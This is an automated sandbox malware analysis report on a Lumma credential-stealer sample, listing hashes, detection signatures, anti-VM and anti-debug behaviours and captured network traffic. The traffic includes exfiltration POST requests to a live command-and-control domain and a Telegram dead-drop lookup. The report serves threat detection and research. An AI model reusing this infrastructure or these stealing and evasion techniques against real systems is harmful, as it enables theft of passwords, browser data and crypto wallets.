Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe

Overview

General Information

Sample name:SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe
Analysis ID:1640295
MD5:f30e34c685fe30cd96083e650fcb70f1
SHA1:82664dc39ac325151d4dda923b54585e8ebccee9
SHA256:210df8c2bdf091c680e289d7fb9d8ffd90044f5995e08cc5bc94d55865d793b1
Tags:exeuser-SecuriteInfoCom
Infos:

Detection

LummaC Stealer
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
Yara detected LummaC Stealer
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Joe Sandbox ML detected suspicious sample
PE file has nameless sections
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000000.00000003.1209759288.0000000000BE0000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    Process Memory Space: SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe PID: 7872JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      0.2.SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe.d90000.0.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
        No Sigma rule has matched
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-03-17T04:17:06.007957+010020283713Unknown Traffic192.168.2.449720149.154.167.99443TCP
        2025-03-17T04:17:06.763933+010020283713Unknown Traffic192.168.2.449721104.21.48.1443TCP
        2025-03-17T04:17:08.533959+010020283713Unknown Traffic192.168.2.449722104.21.48.1443TCP
        2025-03-17T04:17:09.801771+010020283713Unknown Traffic192.168.2.449723104.21.48.1443TCP
        2025-03-17T04:17:10.894017+010020283713Unknown Traffic192.168.2.449724104.21.48.1443TCP
        2025-03-17T04:17:12.355119+010020283713Unknown Traffic192.168.2.449727104.21.48.1443TCP
        2025-03-17T04:17:13.641728+010020283713Unknown Traffic192.168.2.449728104.21.48.1443TCP
        2025-03-17T04:17:16.094731+010020283713Unknown Traffic192.168.2.449731104.21.48.1443TCP

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeAvira: detected
        Source: SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeReversingLabs: Detection: 77%
        Source: SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeVirustotal: Detection: 64%Perma Link
        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00DAE8FA CryptUnprotectData,0_2_00DAE8FA
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00DAFD27 CryptUnprotectData,0_2_00DAFD27
        Source: SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49720 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49721 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49722 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49723 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49724 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49727 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49728 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49731 version: TLS 1.2
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00E24490 FindFirstFileW,0_2_00E24490
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 4x nop then dec ebx0_2_00DD6550
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 4x nop then mov esi, eax0_2_00DAE8FA
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+6D64FE34h]0_2_00DC11F0
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 4x nop then mov byte ptr [esi], dl0_2_00DA1745
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 18A944CDh0_2_00DAFD27
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 18A944CDh0_2_00DAFD27
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 4x nop then movzx esi, byte ptr [esp+edi+414957FAh]0_2_00DBDEE0
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]0_2_00D9A1D0
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]0_2_00D9A1D0
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 4x nop then mov byte ptr [edi], al0_2_00D9C1C0
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-437B6EDCh]0_2_00DDE1A0
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 4x nop then mov dword ptr [esp+04h], 00000000h0_2_00DDE1A0
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-437B6EDCh]0_2_00DDE230
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 4x nop then mov dword ptr [esp+04h], 00000000h0_2_00DDE230
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 4x nop then mov dword ptr [esp+0Ch], edx0_2_00DE03F0
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 1ED597A4h0_2_00DDA5D0
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+0563E4B6h]0_2_00DAC6A6
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+0563E4B6h]0_2_00DAC6A6
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 4x nop then mov dword ptr [esp+04h], esi0_2_00DAC6A6
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 4x nop then movzx eax, byte ptr [esp+edx]0_2_00D9C610
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 4x nop then mov byte ptr [eax], cl0_2_00D9C610
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+1Ch]0_2_00DC08B0
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax]0_2_00DDAC00
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax]0_2_00DDAC00
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 4x nop then mov word ptr [eax], cx0_2_00DACE02
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax+000000C8h]0_2_00DA0F90
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 4x nop then mov word ptr [ebx], cx0_2_00DAB3D0
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 4x nop then mov word ptr [eax], cx0_2_00DAB3D0
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 4x nop then mov ecx, eax0_2_00D9B3B0
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 4x nop then movsx eax, byte ptr [esi+ecx]0_2_00DAB300
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-1Ah]0_2_00D9D4B0
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 4x nop then movzx edi, word ptr [ecx]0_2_00DDF400
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h0_2_00DAD690
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+04h]0_2_00DD76B0
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 4x nop then mov dword ptr [esp+08h], ecx0_2_00DA3886
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx+0563E546h]0_2_00DAF908
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-38h]0_2_00D9FBC0
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-437B6EDCh]0_2_00DDDDF0
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 4x nop then mov dword ptr [esp+04h], 00000000h0_2_00DDDDF0
        Source: global trafficHTTP traffic detected: GET /owowoowokk3j4 HTTP/1.1Connection: Keep-AliveHost: t.me
        Source: Joe Sandbox ViewIP Address: 104.21.48.1 104.21.48.1
        Source: Joe Sandbox ViewIP Address: 104.21.48.1 104.21.48.1
        Source: Joe Sandbox ViewIP Address: 149.154.167.99 149.154.167.99
        Source: Joe Sandbox ViewIP Address: 149.154.167.99 149.154.167.99
        Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49720 -> 149.154.167.99:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49721 -> 104.21.48.1:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49722 -> 104.21.48.1:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49728 -> 104.21.48.1:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49723 -> 104.21.48.1:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49724 -> 104.21.48.1:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49727 -> 104.21.48.1:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49731 -> 104.21.48.1:443
        Source: global trafficHTTP traffic detected: POST /sjASHya HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 41Host: caliberc.life
        Source: global trafficHTTP traffic detected: POST /sjASHya HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=h6U0YO6OsONUuaTVw89User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 19616Host: caliberc.life
        Source: global trafficHTTP traffic detected: POST /sjASHya HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=4qieRAB3AUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8723Host: caliberc.life
        Source: global trafficHTTP traffic detected: POST /sjASHya HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=g37N8Qn4dI6User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20386Host: caliberc.life
        Source: global trafficHTTP traffic detected: POST /sjASHya HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=ih7gw2mPn19xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 2517Host: caliberc.life
        Source: global trafficHTTP traffic detected: POST /sjASHya HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=UvC1356PGpKs0dRUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 551744Host: caliberc.life
        Source: global trafficHTTP traffic detected: POST /sjASHya HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 79Host: caliberc.life
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET /owowoowokk3j4 HTTP/1.1Connection: Keep-AliveHost: t.me
        Source: global trafficDNS traffic detected: DNS query: t.me
        Source: global trafficDNS traffic detected: DNS query: caliberc.life
        Source: unknownHTTP traffic detected: POST /sjASHya HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 41Host: caliberc.life
        Source: SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1194785261.0000000003F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
        Source: SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1194785261.0000000003F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
        Source: SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1194785261.0000000003F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
        Source: SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1194785261.0000000003F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
        Source: SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1194785261.0000000003F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
        Source: SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1194785261.0000000003F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
        Source: SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1194785261.0000000003F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
        Source: SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1194785261.0000000003F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
        Source: SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1194785261.0000000003F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
        Source: SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000002.1258326313.0000000000DF3000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://www.enigmaprotector.com/
        Source: SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000002.1258326313.0000000000DF3000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://www.enigmaprotector.com/openU
        Source: SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1209947318.0000000000BCA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1209843275.0000000000BA4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.c
        Source: SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1194785261.0000000003F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
        Source: SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1194785261.0000000003F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
        Source: SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1171908276.0000000003F43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org?q=
        Source: SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1195975150.0000000000C0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
        Source: SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1195975150.0000000000C0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
        Source: SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1228448566.0000000000BEC000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1209803966.0000000000BEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1209759288.0000000000BE0000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1219958282.0000000000BEB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://caliberc.life/
        Source: SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000002.1258086860.0000000000BEC000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1228448566.0000000000BEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://caliberc.life/3
        Source: SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000002.1258086860.0000000000BEC000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1228448566.0000000000BEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://caliberc.life/O
        Source: SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000002.1258086860.0000000000BEC000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1228448566.0000000000BEC000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1209803966.0000000000BEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1209759288.0000000000BE0000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1219958282.0000000000BEB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://caliberc.life/h
        Source: SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1219958282.0000000000BEB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://caliberc.life/k
        Source: SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000002.1258086860.0000000000BEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://caliberc.life/o
        Source: SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1228448566.0000000000C03000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1228448566.0000000000BEC000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1209759288.0000000000C03000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1206628391.0000000000C16000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1206425402.0000000000C0E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1194632246.0000000000C15000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1219958282.0000000000BEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1206448439.0000000000C15000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1247939503.0000000000BFB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000002.1257974943.0000000000B8A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1247939503.0000000000C03000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1184358636.0000000000C17000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1194603888.0000000000C11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://caliberc.life/sjASHya
        Source: SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1184259968.0000000000C0E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1184358636.0000000000C17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://caliberc.life/sjASHya#
        Source: SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1257336425.0000000000BFC000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000002.1258131560.0000000000BFD000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1247939503.0000000000C03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://caliberc.life/sjASHya##
        Source: SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1219958282.0000000000BEB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://caliberc.life/sjASHyaX_
        Source: SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1257336425.0000000000BFC000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000002.1258131560.0000000000BFD000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1228448566.0000000000BEC000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1247939503.0000000000BFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://caliberc.life/sjASHyac
        Source: SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1228448566.0000000000C03000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1247939503.0000000000C03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://caliberc.life/sjASHyah
        Source: SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1228448566.0000000000BEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://caliberc.life:443/sjASHya
        Source: SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1171908276.0000000003F43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
        Source: SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1171908276.0000000003F43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
